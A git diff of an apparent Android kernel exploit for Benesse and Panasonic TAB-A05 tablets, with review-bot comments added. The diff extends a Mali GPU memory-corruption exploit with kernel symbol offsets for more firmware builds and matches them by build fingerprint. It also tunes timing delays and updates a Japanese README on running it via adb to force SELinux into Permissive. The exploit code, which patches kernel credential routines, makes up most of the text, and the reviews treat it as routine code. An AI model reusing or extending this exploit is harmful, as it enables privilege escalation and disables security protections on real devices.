diff --git a/README.md b/README.md
index a3316c4..9bfecf6 100644
--- a/README.md
+++ b/README.md
@@ -24,11 +24,7 @@ adb shell /data/local/tmp/shrinker
 > 途中でクラッシュしたり、無効な引数があると返される場合があります。
 > 残念ながら**仕様**なので、根気強く何度も挑戦して下さい。
-一番最後に **`result 49`** と返ってきたら、
-```
-adb shell getenforce
-```
-結果が **`Permissive`** と返って来る事を確認して下さい。
+一番最後に **`Permissive`** と返ってきたら、
 エクスプロイトの実行は成功です。
 TAB-A05-BD 01.11.000 での実行コード
@@ -65,7 +61,6 @@ run_enforce_un: open
 run_enforce_un: after read
 run_enforce_un: after close
 result 49
-TAB-A05-BD:/ $ getenforce
 Permissive
 ```
@@ -82,6 +77,9 @@ Permissive
 > [!IMPORTANT]
 > SELinux が **`Permissive`** の状態の端末を使用してください。
+> [!TIP]
+> [**EasyBLU**](https://github.com/Kobold831/EasyBLU) を用いると簡単です。
+
 始めに、[**DchaServiceTester**](https://github.com/s1204IT/DchaServiceTester/releases/latest) をインストールしてください。
 インストールが終わり次第、アプリを起動し、**`copyUpdateImage`** を選択して下さい。
diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
index c4f8b73..342dd83 100644
--- a/mali_shrinker_mmap32.c
+++ b/mali_shrinker_mmap32.c
@@ -76,18 +76,57 @@ Search: sel_read_enforce -> SELINUX_ENFORCING = ldr - KERNEL_BASE
 Need: ARM to HEX
-ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED)
 ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
+ADD_COMMIT = add x8, x8, #0x(Last 3 digits of COMMIT_CRED)
 */
 /*
  * Maintained by Syuugo
 */
+// TAB-A05-BD 00.04.000
+#define COMMIT_CREDS_CTX_00_04_000 0x5a120
+#define AVC_DENY_CTX_00_04_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_04_000 0x3653a8
+#define SEL_READ_HANDLE_UNKNOWN_CTX_00_04_000 0x365d80
+#define INIT_CRED_CTX_00_04_000 0x11553f0
+#define SELINUX_ENFORCING_CTX_00_04_000 0x129d9bc
+#define ADD_INIT_CTX_00_04_000 0x910fc000
+#define ADD_COMMIT_CTX_00_04_000 0x91048108
+
+// TAB-A05-BD 00.05.000
+#define COMMIT_CREDS_CTX_00_05_000 0x5a120
+#define AVC_DENY_CTX_00_05_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_05_000 0x3653a8
+#define SEL_READ_HANDLE_UNKNOWN_CTX_00_05_000 0x365d80
+#define INIT_CRED_CTX_00_05_000 0x11553f0
+#define SELINUX_ENFORCING_CTX_00_05_000 0x129d9bc
+#define ADD_INIT_CTX_00_05_000 0x910fc000
+#define ADD_COMMIT_CTX_00_05_000 0x91048108
+
+// TAB-A05-BD 00.08.000
+#define COMMIT_CREDS_CTX_00_08_000 0x5a120
+#define AVC_DENY_CTX_00_08_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_08_000 0x3653a8
+#define SEL_READ_HANDLE_UNKNOWN_CTX_00_08_000 0x365d80
+#define INIT_CRED_CTX_00_08_000 0x11553f0
+#define SELINUX_ENFORCING_CTX_00_08_000 0x129d9bc
+#define ADD_INIT_CTX_00_08_000 0x910fc000
+#define ADD_COMMIT_CTX_00_08_000 0x91048108
+
+// TAB-A05-BD 00.09.000
+#define COMMIT_CREDS_CTX_00_09_000 0x5a120
+#define AVC_DENY_CTX_00_09_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_09_000 0x3653a8
+#define SEL_READ_HANDLE_UNKNOWN_CTX_00_09_000 0x365d80
+#define INIT_CRED_CTX_00_09_000 0x11553f0
+#define SELINUX_ENFORCING_CTX_00_09_000 0x129d9bc
+#define ADD_INIT_CTX_00_09_000 0x910fc000
+#define ADD_COMMIT_CTX_00_09_000 0x91048108
+
 // TAB-A05-BD 01.00.000
 #define COMMIT_CREDS_CTX_01_00_000 0x5a120
 #define 
AVC_DENY_CTX_01_00_000 0x35acc8
-#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc
 #define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8
 #define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80
 #define INIT_CRED_CTX_01_00_000 0x11553f0
@@ -125,6 +164,16 @@ ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
 #define ADD_INIT_CTX_01_11_000 0x910fc000
 #define ADD_COMMIT_CTX_01_11_000 0x91048108
+// TAB-A05-BA1 00.03.000
+#define COMMIT_CREDS_CTZ_00_03_000 0x5a120
+#define AVC_DENY_CTZ_00_03_000 0x359c20
+#define SEL_READ_ENFORCE_CTZ_00_03_000 0x364370
+#define SEL_READ_HANDLE_UNKNOWN_CTZ_00_03_000 0x364d48
+#define INIT_CRED_CTZ_00_03_000 0x11753f0
+#define SELINUX_ENFORCING_CTZ_00_03_000 0x12e49bc
+#define ADD_INIT_CTZ_00_03_000 0x910fc000
+#define ADD_COMMIT_CTZ_00_03_000 0x91048108
+
 // TAB-A05-BA1 01.00.000
 #define COMMIT_CREDS_CTZ_01_00_000 0x5a120
 #define AVC_DENY_CTZ_01_00_000 0x359c20
@@ -181,8 +230,8 @@ static uint64_t selinux_enforcing;
 //static uint64_t avc_deny = 0x2CCC28;
 static uint64_t avc_deny;
-static uint64_t selinux_enforcing_READ = 0X0;
-static uint64_t selinux_enforcing_WRITE = 0X0;
+static uint64_t selinux_enforcing_READ = 0x0;
+static uint64_t selinux_enforcing_WRITE = 0x0;
 /* Overwriting SELinux to permissive
 strb wzr, [x0]
@@ -634,7 +683,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
 if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
 err(1, "submit job failed\n");
 }
- usleep(300000);
+ usleep(100000);
 }
 void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, uint64_t value, enum mali_write_value_type type) {
@@ -651,7 +700,7 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u
 LOG("write_data overwrite addr : %llx %llx\n", overwrite_addr + data_offset, data_offset);
 curr_overwrite_addr = overwrite_addr;
 write_to(mali_fd, overwrite_addr + data_offset, value, atom_number++, type);
- usleep(300000);
+ usleep(100000);
 }
 }
 }
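Review bot: `#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc` is removed in this hunk and nothing in the hunk redefines it, yet select_offset() in the `@@ -729` hunk still assigns `selinux_enforcing = SELINUX_ENFORCING_CTX_01_00_000`; this is fine only if the file already carries a second definition outside the three trailing context lines (presumably after `INIT_CRED_CTX_01_00_000`, where every other block places it), otherwise the build now fails, so the commit should say which it is. The four added TAB-A05-BD 00.04.000–00.09.000 blocks are value-for-value identical to each other and to the existing 01.00.000 block, which is worth stating once rather than leaving a reader to compare eight constants per block, e.g. `// 00.04.000 through 01.00.000: same kernel image, offsets identical to 01.00.000` above the first of them. The `@@ -125` hunk adds the TAB-A05-BA1 00.03.000 block in the same style and the same remark applies where its values repeat the 01.00.000 block.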
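Review bot: `usleep(100000)` is now written out literally at five sites (this hunk, `@@ -651`, `@@ -659`, `@@ -675`, `@@ -803`) and the commit had to edit every one of them to change the value; one file-scope constant next to the other statics, `#define SETTLE_DELAY_US 100000` (name is a placeholder), with each call reading `usleep(SETTLE_DELAY_US);`, makes the next retune a one-line change and gives the delay a name that says what it is waiting for. The same applies to `sleep(2)` in run_enforce() and run_enforce_un() (`@@ -684`, `@@ -712`). Nothing in the diff records why 300 ms became 100 ms or on which firmware the new value was checked, while the README in the same commit still warns that runs can crash and need retrying, so a one-line comment at the constant's definition recording the rationale would help whoever has to decide whether to raise it again. write_to() and write_data() both begin before their hunks.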
@@ -659,7 +708,7 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u
 void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
 printf("write_func called with code_size = %llu\n", code_size);
- usleep(300000);
+ usleep(100000);
 uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
 uint64_t curr_overwrite_addr = 0;
 for (int i = 0; i < size; i++) {
@@ -675,7 +724,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u
 for (int code = code_size - 1; code >= 0; code--) {
 write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
- usleep(300000);
+ usleep(100000);
 }
 }
 }
@@ -684,7 +733,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u
 int run_enforce() {
 char result = '2';
 printf("run_enforce: before sleep\n");
- sleep(3);
+ sleep(2);
 printf("run_enforce: after sleep\n");
 int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
 printf("run_enforce: open\n");
@@ -712,7 +761,7 @@ int run_enforce_write() {
 int run_enforce_un() {
 char result = '2';
 printf("run_enforce_un: before sleep\n");
- sleep(3);
+ sleep(2);
 printf("run_enforce_un: after sleep\n");
 int enforce_fd = open("/sys/fs/selinux/deny_unknown", O_RDONLY);
 printf("run_enforce_un: open\n");
@@ -729,6 +778,34 @@ void select_offset() {
 int len = __system_property_get("ro.build.fingerprint", fingerprint);
 LOG("fingerprint: %s\n", fingerprint);
+ if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.04.000/00.04.000:user/release-keys")) {
+ selinux_enforcing = SELINUX_ENFORCING_CTX_00_04_000;
+ sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_04_000;
+ fixup_root_shell(INIT_CRED_CTX_00_04_000, COMMIT_CREDS_CTX_00_04_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_04_000, ADD_INIT_CTX_00_04_000, ADD_COMMIT_CTX_00_04_000);
+ return;
+ }
+
+ if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.05.000/00.05.000:user/release-keys")) {
+ selinux_enforcing = SELINUX_ENFORCING_CTX_00_05_000;
+ sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_05_000;
+ fixup_root_shell(INIT_CRED_CTX_00_05_000, COMMIT_CREDS_CTX_00_05_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_05_000, ADD_INIT_CTX_00_05_000, ADD_COMMIT_CTX_00_05_000);
+ return;
+ }
+
+ if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.08.000/00.08.000:user/release-keys")) {
+ selinux_enforcing = SELINUX_ENFORCING_CTX_00_08_000;
+ sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_08_000;
+ fixup_root_shell(INIT_CRED_CTX_00_08_000, COMMIT_CREDS_CTX_00_08_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_08_000, ADD_INIT_CTX_00_08_000, ADD_COMMIT_CTX_00_08_000);
+ return;
+ }
+
+ if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.09.000/00.09.000:user/release-keys")) {
+ selinux_enforcing = SELINUX_ENFORCING_CTX_00_09_000;
+ sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_09_000;
+ fixup_root_shell(INIT_CRED_CTX_00_09_000, COMMIT_CREDS_CTX_00_09_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_09_000, ADD_INIT_CTX_00_09_000, ADD_COMMIT_CTX_00_09_000);
+ return;
+ }
+
 if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/01.00.000/01.00.000:user/release-keys")) {
 selinux_enforcing = SELINUX_ENFORCING_CTX_01_00_000;
 sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000;
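Review bot: Each new fingerprint branch repeats the same five statements with only the version suffix changed, and `SEL_READ_HANDLE_UNKNOWN_CTX_*` appears twice per branch (the assignment to `sel_read_handle_unknown` and the third `fixup_root_shell` argument), so a copy-paste slip in one of the eight blocks — a 00.08.000 branch picking up a 00.09.000 macro, say — compiles silently and is hard to spot by eye. A `static const struct { const char *fingerprint; uint64_t selinux_enforcing, sel_read_handle_unknown, init_cred, commit_creds, add_init, add_commit; } builds[]` table walked by one `strcmp` loop would turn every branch here and in `@@ -757` into a single row and make a mismatched row visible in place. Separately, `len` returned by `__system_property_get()` on the first context line is never checked; if the property is empty or missing, `fingerprint` holds whatever it held before (its declaration is outside the hunk) and control falls through every branch, and what happens after the last branch is not visible here. select_offset() begins before the hunk.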
@@ -757,6 +834,13 @@ void select_offset() {
 return;
 }
+ if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/00.03.000/00.03.000:user/release-keys")) {
+ selinux_enforcing = SELINUX_ENFORCING_CTZ_00_03_000;
+ sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_00_03_000;
+ fixup_root_shell(INIT_CRED_CTZ_00_03_000, COMMIT_CREDS_CTZ_00_03_000, SEL_READ_HANDLE_UNKNOWN_CTZ_00_03_000, ADD_INIT_CTZ_00_03_000, ADD_COMMIT_CTZ_00_03_000);
+ return;
+ }
+
 if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.00.000/01.00.000:user/release-keys")) {
 selinux_enforcing = SELINUX_ENFORCING_CTZ_01_00_000;
 sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_00_000;
@@ -803,7 +887,7 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
 uint64_t selinux_enforcing_addr = (((selinux_enforcing + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
 write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), selinux_enforcing_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
- usleep(300000);
+ usleep(100000);
 // Go through the reserve pages addresses to write to avc_denied with our own shellcode
 write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
@@ -947,7 +1031,7 @@ int main() {
 int flush_idx = 0;
 for (int i = 0; i < 10; i++) {
 if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
- system("sh");
+ system("getenforce");
 break;
 }
 }
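Review bot: The result of `system("getenforce")` is discarded, so main() neither logs a failed spawn nor reflects the outcome in its exit status (the rest of main is outside the hunk), and the README change in this same commit now asks the user to judge success by reading `Permissive` off the console. The program already reads `/sys/fs/selinux/enforce` itself in run_enforce() (`@@ -684` hunk), so the loop could keep that result and return a non-zero status when the expected state is not observed, which a caller can test without parsing output and which does not depend on a `getenforce` binary being on PATH in the spawned shell. If the shell-out stays, at least check it: `if (system("getenforce") != 0) { LOG("getenforce failed\n"); }`.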